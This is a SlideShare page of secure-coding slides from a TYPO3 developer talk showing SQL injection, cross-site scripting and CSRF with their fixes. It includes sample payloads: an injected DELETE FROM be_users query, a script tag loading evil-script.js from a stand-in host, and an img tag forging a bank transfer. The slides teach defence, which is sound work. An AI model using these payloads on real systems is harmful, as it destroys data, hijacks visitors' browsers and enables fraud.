Writing secure code
     by Dmitry Dulepov
Security is the issue
You are responsible
You must not fail
Write secure code now!
3 attacks
SQL injection: how
SQL injection: how

index.php?id=1
SQL injection: how

index.php?id=1
“SELECT * FROM pages WHERE ” .
“id=’” . $_GET[‘id’] . “‘“
SQL injection: how

index.php?id=1
“SELECT * FROM pages WHERE ” .
“id=’” . $_GET[‘id’] . “‘“
index.php?id=1’;DELETE FROM
b...
SQL injection: how

index.php?id=1
“SELECT * FROM pages WHERE ” .
“id=’” . $_GET[‘id’] . “‘“
index.php?id=1’;DELETE FROM
b...
SQL injection: the fix
SQL injection: the fix

“SELECT * FROM pages WHERE ” .
“id=” . $GLOBALS[‘TYPO3’]->
fullQuoteStr($id, ‘pages’)
SQL injection: the fix

“SELECT * FROM pages WHERE ” .
“id=” . $GLOBALS[‘TYPO3’]->
fullQuoteStr($id, ‘pages’)


“SELECT * F...
Cross–site scripting: how
Cross–site scripting: how

 Comment:
 I agree!
 <script src=”http://example.com/
 evil-script.js”>
 </script>



 Submit
Cross–site scripting: the x
Cross–site scripting: the x


  htmlspecialchars($comment)
Cross–site request forgery: how
Cross–site request forgery: how

  <img src=”http://yourbank.com/
  transfer?
  to_account=DE25LALA1234567890&
  amount=40...
Cross–site request forgery: the x
Cross–site request forgery: the x


   • _POST
   • random   number
Cross–site request forgery: the x


   • _POST
   • random   number
Cross–site request forgery: the x


   • _POST
   • random   number


  • Salted magic   value
  • Captcha
Remember about security
Make customers happy!
Upcoming SlideShare
Loading in …5
×

Writing secure code

5,703 views

Published on

These are slides from the TYPO3 developer days 2009 talk. It shows 3 most typical security problems in the code and how to avoid them.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
5,703
On SlideShare
0
From Embeds
0
Number of Embeds
519
Actions
Shares
0
Downloads
113
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide


  • #3413901
  • #5000627


  • #7333775


































  • Writing secure code

    1. 1. Writing secure code by Dmitry Dulepov
    2. 2. Security is the issue
    3. 3. You are responsible
    4. 4. You must not fail
    5. 5. Write secure code now!
    6. 6. 3 attacks
    7. 7. SQL injection: how
    8. 8. SQL injection: how index.php?id=1
    9. 9. SQL injection: how index.php?id=1 “SELECT * FROM pages WHERE ” . “id=’” . $_GET[‘id’] . “‘“
    10. 10. SQL injection: how index.php?id=1 “SELECT * FROM pages WHERE ” . “id=’” . $_GET[‘id’] . “‘“ index.php?id=1’;DELETE FROM be_users’
    11. 11. SQL injection: how index.php?id=1 “SELECT * FROM pages WHERE ” . “id=’” . $_GET[‘id’] . “‘“ index.php?id=1’;DELETE FROM be_users’ “SELECT * FROM pages WHERE ” . “id=’1‘;DELETE FROM be_users ‘’“
    12. 12. SQL injection: the fix
    13. 13. SQL injection: the fix “SELECT * FROM pages WHERE ” . “id=” . $GLOBALS[‘TYPO3’]-> fullQuoteStr($id, ‘pages’)
    14. 14. SQL injection: the fix “SELECT * FROM pages WHERE ” . “id=” . $GLOBALS[‘TYPO3’]-> fullQuoteStr($id, ‘pages’) “SELECT * FROM pages WHERE ” . “id=” . intval($id)
    15. 15. Cross–site scripting: how
    16. 16. Cross–site scripting: how Comment: I agree! <script src=”http://example.com/ evil-script.js”> </script> Submit
    17. 17. Cross–site scripting: the x
    18. 18. Cross–site scripting: the x htmlspecialchars($comment)
    19. 19. Cross–site request forgery: how
    20. 20. Cross–site request forgery: how <img src=”http://yourbank.com/ transfer? to_account=DE25LALA1234567890& amount=4000& currency=EUR” />
    21. 21. Cross–site request forgery: the x
    22. 22. Cross–site request forgery: the x • _POST • random number
    23. 23. Cross–site request forgery: the x • _POST • random number
    24. 24. Cross–site request forgery: the x • _POST • random number • Salted magic value • Captcha
    25. 25. Remember about security
    26. 26. Make customers happy!

    ×